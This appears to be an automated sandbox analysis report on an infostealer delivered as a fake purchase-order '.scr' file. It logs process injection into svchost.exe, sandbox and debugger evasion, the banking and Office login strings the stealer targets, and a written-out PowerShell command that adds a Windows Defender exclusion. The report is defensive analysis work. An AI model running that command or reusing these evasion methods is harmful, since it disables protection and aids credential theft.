                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 98801Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 98685Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 98562Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 98451Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 98328Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 98217Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 98093Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 97983Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 97842Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 97690Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 97445Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 97324Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 97203Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 97088Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 99875Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 99764Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 99655Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 99546Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 99431Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 99312Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 99202Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 99093Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 98984Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 98875Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 98765Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 98656Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 98547Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 98437Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 98182Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 98075Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 97890Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 97762Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 97653Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 97541Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 97437Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 97312Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 97094Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 96984Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 1200000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 1199870Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 1199765Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 1199654Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 1199531Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\build.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 60000
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 60000
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\Cache\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Jump to behavior
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                            Source: Spectrum.exe, 00000025.00000003.2335866500.000000000053D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                            Source: Spectrum.exe, 00000025.00000003.2335866500.000000000053D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #TSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                            Source: Spectrum.exe, 00000025.00000003.2335525609.0000000000524000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                            Source: SensorDataService.exe, 00000023.00000003.2314646412.0000000000644000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 00000023.00000003.2314901954.0000000000644000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver
                            Source: Native_Redline_BTC.exe, 00000006.00000002.2129851601.000000000055E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                            Source: alg.exe, 00000009.00000003.3298047259.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2587369712.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2725793461.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2641781426.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2605900173.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2464247908.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2576145561.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3259678244.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2560073777.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2177000744.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2621710164.000000000056E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: SensorDataService.exe, 00000023.00000002.2422375544.0000000000630000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 00000023.00000003.2418758943.000000000062F000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 00000023.00000003.2418497581.000000000061C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 GMicrosoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter
                            Source: SensorDataService.exe, 00000023.00000003.2314646412.0000000000635000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000025.00000003.2335525609.0000000000524000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wgencounter.inf,%gencounter.devicedesc%;Microsoft Hyper-V Generation Counter
                            Source: Native_Redline_BTC.exe, 00000006.00000002.2129851601.000000000055E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: I-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                            Source: SensorDataService.exe, 00000023.00000003.2418257754.000000000064F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                            Source: alg.exe, 00000009.00000002.3323934646.0000000000503000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@cW%SystemRoot%\system32\mswsock.dll
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                            Source: Spectrum.exe, 00000025.00000003.2335525609.0000000000524000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                            Source: Spectrum.exe, 00000025.00000003.2335525609.0000000000524000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4NECVMWar VMware SATA CD00
                            Source: snmptrap.exe, 00000024.00000002.3323126033.0000000000584000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
                            Source: SensorDataService.exe, 00000023.00000003.2418257754.000000000064F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00
                            Source: SensorDataService.exe, 00000023.00000003.2418257754.000000000064F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk SCSI Disk Device
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                            Source: Spectrum.exe, 00000025.00000003.2335866500.000000000053D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk SCSI Disk Devicer%T#T
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                            Source: AppVClient.exe, 00000016.00000003.2182103866.00000000004BF000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000016.00000002.2185176053.00000000004F0000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000016.00000003.2182232459.00000000004EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine
                            Source: alg.exe, 00000009.00000003.3298047259.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2587369712.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2725793461.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2641781426.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2605900173.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2464247908.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2576145561.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3259678244.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2560073777.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2177000744.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2621710164.000000000056E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW^lw
                            Source: build.exe, 00000007.00000002.2550955586.0000000001180000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                            Source: SensorDataService.exe, 00000023.00000003.2314646412.0000000000635000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000025.00000003.2335525609.0000000000524000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wvid.inf,%vid.devicedesc%;Microsoft Hyper-V Virtualization Infrastructure Driver`
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                            Source: Spectrum.exe, 00000025.00000003.2335866500.000000000053D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                            Source: Spectrum.exe, 00000025.00000003.2335525609.0000000000524000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                            Source: SensorDataService.exe, 00000023.00000003.2418257754.000000000064F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @,eSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                            Source: Spectrum.exe, 00000025.00000003.2335866500.000000000053D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                            Source: SensorDataService.exe, 00000023.00000003.2418497581.000000000061C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @oem2.infloc.vmwarebusdevicedescVMware VMCI Bus DeviceV`
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                            Source: build.exe, 00000007.00000002.2559158756.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                            Source: Spectrum.exe, 00000025.00000003.2335525609.0000000000524000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JVMware Virtual disk SCSI Disk Device
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 7_2_05B46D90 LdrInitializeThunk,7_2_05B46D90
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0045A259 BlockInput,0_2_0045A259
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0553E500 mov eax, dword ptr fs:[00000030h]0_2_0553E500
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0553E4A0 mov eax, dword ptr fs:[00000030h]0_2_0553E4A0
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0553CEA0 mov eax, dword ptr fs:[00000030h]0_2_0553CEA0
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_057B14E0 mov eax, dword ptr fs:[00000030h]3_2_057B14E0
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_057B1480 mov eax, dword ptr fs:[00000030h]3_2_057B1480
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_057AFE80 mov eax, dword ptr fs:[00000030h]3_2_057AFE80
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04B13F3D mov eax, dword ptr fs:[00000030h]4_2_04B13F3D
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AD1130 mov eax, dword ptr fs:[00000030h]4_2_04AD1130
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_00426DA1
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess token adjusted: Debug
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0042202E SetUnhandledExceptionFilter,0_2_0042202E
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004230F5
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00417D93
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00421FA7
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_0042202E SetUnhandledExceptionFilter,3_2_0042202E
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_004230F5
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00417D93
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00421FA7
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004015D7 SetUnhandledExceptionFilter,4_2_004015D7
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004015D7 SetUnhandledExceptionFilter,4_2_004015D7
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04B14C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_04B14C7B
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04B11361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_04B11361
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Adds a directory exclusion to Windows Defender
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                            Found direct / indirect Syscall (likely to bypass EDR)
                            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtOpenKeyEx: Indirect: 0x140077B9B
                            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtQueryValueKey: Indirect: 0x140077C9F
                            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtClose: Indirect: 0x140077E81
                            Maps a DLL or memory area into another process
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                            Writes to foreign memory regions
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2814008Jump to behavior
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0043916A LogonUserW,0_2_0043916A
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_00436431
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe"Jump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\microsofts.exe "C:\Users\user\AppData\Local\Temp\microsofts.exe" Jump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe "C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
